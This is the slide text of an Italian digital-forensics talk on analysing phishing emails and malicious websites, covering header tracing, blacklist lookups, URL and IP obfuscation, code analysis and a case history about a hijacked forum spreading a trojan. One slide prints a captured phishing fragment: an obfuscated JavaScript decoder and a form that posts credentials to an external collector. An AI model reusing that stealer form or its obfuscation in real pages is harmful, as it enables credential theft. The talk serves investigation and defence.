  • 9. Vero o falso? ? Oggetto:  Eseguiamo la manutenzione delle nostre misure di sicurezza Da:  quot;Poste italianequot; <Admin@bancopostaonline.poste.it> Rispondi:  quot;Poste italianequot; <Admin@bancopostaonline.poste.it>  Data:  29/05/2008 18:26 A: guelfoweb@gmail.com  Partiamo dagli headers  Percorso (MTA) seguito dall'email per raggiungerci (Recived:)  disposto in ordine inverso  Data, ora, protocollo, indirizzo ip Gianni Amato http://www.cfitaly.net 9
  • 10. Delivered­To: guelfoweb@gmail.com Received: by 10.142.162.2 with SMTP id k2cs28985wfe;         Thu, 29 May 2008 09:26:09 ­0700 (PDT) Received: by 10.86.54.3 with SMTP id c3mr4230fga.55.1212078368105; H         Thu, 29 May 2008 09:26:08 ­0700 (PDT) e Return­Path: <Admin@bancopostaonline.poste.it> a Received: from smtp21.orange.fr (smtp21.orange.fr [80.12.242.48]) d         by mx.google.com with ESMTP id l12si757120fgb.8.2008.05.29.09.26.04; e         Thu, 29 May 2008 09:26:08 ­0700 (PDT) r Received­SPF: neutral (google.com: 80.12.242.48 is neither permitted nor denied by  best guess record for domain of Admin@bancopostaonline.poste.it) client­ ip=80.12.242.48; Authentication­Results: mx.google.com; spf=neutral (google.com: 80.12.242.48 is  neither permitted nor denied by best guess record for domain of  Admin@bancopostaonline.poste.it) smtp.mail=Admin@bancopostaonline.poste.it Gianni Amato http://www.cfitaly.net 10
  • 11. Received: from User (ks3825.kimsufi.com [213.186.40.121]) by mwinf2114.orange.fr (SMTP Server) with ESMTP id AB8AC1C0011C; Thu, 29 May 2008 18:26:03 +0200 (CEST) X­ME­UUID: 20080529162603702.AB8AC1C0011C@mwinf2114.orange.fr From: quot;Poste italianequot; <Admin@bancopostaonline.poste.it> H e Subject: Eseguiamo la manutenzione delle nostre misure di sicurezza a Date: Thu, 29 May 2008 18:26:03 +0200 d MIME­Version: 1.0 e Content­Type: text/html; r charset=quot;Windows­1251quot; Content­Transfer­Encoding: 7bit X­Priority: 3 X­MSMail­Priority: Normal X­Mailer: Microsoft Outlook Express 6.00.2600.0000 X­MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message­Id: <20080529162603.AB8AC1C0011C@mwinf2114.orange.fr> Gianni Amato http://www.cfitaly.net 11
  • 12. Interrogare i server, i motori di  ricerca e le blacklists  whois  traceroute  blacklist  http://mxtoolbox.com/blacklists.aspx Gianni Amato http://www.cfitaly.net 12
  • 13. Criminali furbi  Fake headers  Proxy anonimi (HTTP Proxy, SOCKS, ecc.)  Relay aperti (SMTP)  Reti WiFi aperte o poco protette  Botnet Gianni Amato http://www.cfitaly.net 13
  • 14. Url encoding  http://www.sitoweb.it/?url=sitotarget.it  http://www.sitoweb.it/?url=%67%6F%6F%67%6C%......  IP : 22.22.22.22  Octal : 0026.0026.0026.0026  Hex : 0x16.0x16.0x16.0x16  Dotless: 370546198 Gianni Amato http://www.cfitaly.net 14
  • 15. Analisi di un sito web  Analisi preliminare  Analisi del codice  Indagini temporali  Indagini avanzate Gianni Amato http://www.cfitaly.net 15
  • 16. Analisi preliminare  Navigare e catalogare il sito  Individuare i collegamenti relativi  es. css e script esterni  Il codice fa la differenza Gianni Amato http://www.cfitaly.net 16
  • 17. Analisi preliminare xss Sfruttare le  vulnerabilità  dei siti web  code  Fake per iniettare  injection codice  arbitrario <iframe> Gianni Amato http://www.cfitaly.net 17
  • 18. Analisi preliminare Gianni Amato Fake http://www.cfitaly.net 18
  • 19. Analisi del codice  Scaricare il codice sorgente in locale  Browser (Firefox, Opera, Internet Explorer)  Amaya  Wget wget ­m ­k http://www.sitoweb.it n.b. fare attenzione ai limiti di banda Gianni Amato http://www.cfitaly.net 19
  • 20. Analisi del codice  Interpretare la struttura del codice  Codice lungo e poco ordinato  Meccanica incomprensibile  soprattutto se il codice è offuscato  Link, tag e formattazioni Gianni Amato http://www.cfitaly.net 20
  • 21. Analisi del codice Javascript  Escape e Unescape;  Base64;  1000 modi per inventarsi una funzione di  codifica; Gianni Amato http://www.cfitaly.net 21
  • 22. Analisi del codice Ok, ora è tutto chiaro !? Gianni Amato http://www.cfitaly.net 22
  • 23. Analisi del codice  Commento  <!­­hppage status­”protected”­­>  Esiste sempre un punto di partenza  document.write(unescape(“%3C%53%43... Gianni Amato http://www.cfitaly.net 23
  • 24. Analisi del codice <SCRIPT LANGUAGE=quot;JavaScriptquot;><!­­ hp_ok=true;function hp_d01(s){if(!hp_ok)return; var o=quot;quot;,ar=new Array(),os=quot;quot;,ic=0; for(i=0;i<s.length;i++){c=s.charCodeAt(i); script code if(c<128)c=c^2; os+=String.fromCharCode(c); if(os.length>80){ar[ic++]=os;os=quot;quot;}}o=ar.join(quot;quot;) +os;document.write(o)}//­­></SCRIPT> <form name=quot;Form_Authquot;  Credential Stealer action=quot;http://www.biohasardz.com/memo/images/1.phpquot;  method=quot;postquot;> ........... Gianni Amato http://www.cfitaly.net 24
  • 25. Analisi del codice  Individuare (se presenti) i metadati  alcuni software utilizzati per lo sviluppo delle  pagine web aggiungono informazioni al codice  Nome del programma utilizzato  Il nome dell'autore autore  Numero di revisioni  Data e ora Gianni Amato http://www.cfitaly.net 25
  • 26. Analisi del codice <!DOCTYPE HTML PUBLIC quot;­//W3C//DTD HTML 4.0 Transitional//ENquot;> <HTML> <HEAD> <META HTTP­EQUIV=quot;CONTENT­TYPEquot; CONTENT=quot;text/html; charset=utf­8quot;> <TITLE></TITLE> <META NAME=quot;GENERATORquot; CONTENT=quot;OpenOffice.org 2.3  (Linux)quot;> <META NAME=quot;AUTHORquot; CONTENT=quot;guelfowebquot;> <META NAME=quot;CREATEDquot; CONTENT=quot;20080614;18464300quot;> <META NAME=quot;CHANGEDBYquot; CONTENT=quot;guelfowebquot;> <META NAME=quot;CHANGEDquot; CONTENT=quot;20080614;18472200quot;> <STYLE TYPE=quot;text/cssquot;> <!­­ @page { size: 21cm 29.7cm; margin: 2cm } P { margin­bottom: 0.21cm } ­­> </STYLE> </HEAD> <BODY LANG=quot;it­ITquot; DIR=quot;LTRquot;> <P STYLE=quot;margin­bottom: 0cmquot;>questa &egrave; una pagina web</P> </BODY> </HTML> Gianni Amato http://www.cfitaly.net 26
  • 27. Analisi del codice  Indizi da non trascurare  Errori  Commenti  Istruzioni commentate Possono fornire importanti informazioni! Gianni Amato http://www.cfitaly.net 27
  • 28. Indagine temporale Evoluzione del sito e vecchi contenuti  The Wayback Machine  archive.org  Google Cache Gianni Amato http://www.cfitaly.net 28
  • 29. Indagine avanzata  Directory listings  Hidden directories  Hidden files  Hidden subdomains Gianni Amato http://www.cfitaly.net 29
  • 30. Indagine avanzata Gianni Amato http://www.cfitaly.net 30
  • 31. Indagine avanzata  Le direttive del file robots.txt  invita gli spiders dei motori di ricerca a non  leggere o non indicizzare determinate pagine  web;  aiuta gli investigatori a individuare i contenuti  che il webmaster ha scelto, per qual si voglia  motivo, di tenere nascosti; Gianni Amato http://www.cfitaly.net 31
  • 32. Indagine avanzata  Non utilizzare tools aggressivi che  potrebbero compromettere il sistema e  di conseguenza infangare le prove Gianni Amato http://www.cfitaly.net 32
  • 33. Case history Associazione Meter – Don Fortunato Di Noto  Dalla pedopornografia al virus passando  per un forum. Gianni Amato http://www.cfitaly.net 33
  • 34. Case history Associazione Meter – Don Fortunato Di Noto  All'interno del forum del sito web (xxx),  oggetto di indagine, sono state rilevate  immagini a carattere pornografico e  pedopornografico Gianni Amato http://www.cfitaly.net 34
  • 35. Case history Associazione Meter – Don Fortunato Di Noto  Dalle indagini è emerso che  il forum era stato abbandonato da quasi 3 anni;  era stato compromesso sfruttando una  vulnerabilità nota della piattaforma di gestione;  erano state inserite delle keywords per scalare  posizione nei motori di ricerca; Gianni Amato http://www.cfitaly.net 35
  • 36. Case history Associazione Meter – Don Fortunato Di Noto  Dalle indagini è emerso che  la presenza di immagini pornografiche e  pedopornografiche era solo un pretesto per  invitare l'utente a cliccarci sopra e scaricare un  trojan che si spacciava per un codec;  il trojan implementava funzionalità di backdoor  che consentiva ai criminali di creare un botnet; Gianni Amato http://www.cfitaly.net 36
  • 37. Case history Associazione Meter – Don Fortunato Di Noto  Dalle indagini è emerso che  il trojan risiedeva su un server straniero;  una volta infettata la macchina, il trojan  comunicava con diversi siti su server stranieri;  le date di registrazione dei siti coincidevano o  differivano di qualche giorno; Gianni Amato http://www.cfitaly.net 37
  • 38. Case history Associazione Meter – Don Fortunato Di Noto  Tra il 2007 e 2008 sono stati individuati 15  casi analoghi  Principali vittime:  Comuni  Scuole  Università Gianni Amato http://www.cfitaly.net 38
  • 39. CONTATTI Gianni Amato  http://www.gianniamato.it E­Mail: gianni@gianniamato.it Cell. +39­3202842382 Gianni Amato http://www.cfitaly.net 39